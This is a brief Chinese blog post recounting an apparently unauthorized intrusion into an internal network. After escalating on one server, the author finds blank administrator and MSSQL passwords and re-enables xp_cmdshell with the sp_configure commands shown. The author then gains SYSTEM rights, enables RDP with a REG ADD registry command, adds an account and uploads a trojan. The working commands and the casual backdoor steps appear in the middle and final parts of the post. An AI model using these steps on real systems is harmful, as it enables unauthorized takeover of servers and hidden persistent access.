记一次简单内网渗透

毫无技术含量,

提权一台服务器,是内网,想着渗透下试试,端口转发连接,先扫了下端口,



用神器查了下管理员密码是空= =

既然是空口令,登录下那个开3389的机器试试咯,



账户限制,登录不了,那就先不管他,看看那两个开了1433的是否是弱口令,


一台不是弱口令,另一台空口令直接连接上了,哈哈





执行cmd命令提示:

Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。


这样就修复下,

执行以下SQL内容:
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure

go


然后再执行,查下是什么权限,




系统权限,接下来就更加简单了,o(∩_∩)o 哈哈


开下3389,命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f






然后添加个账户,上传个马,完事。




其他的就懒得搞了。。没耐心。

评论回复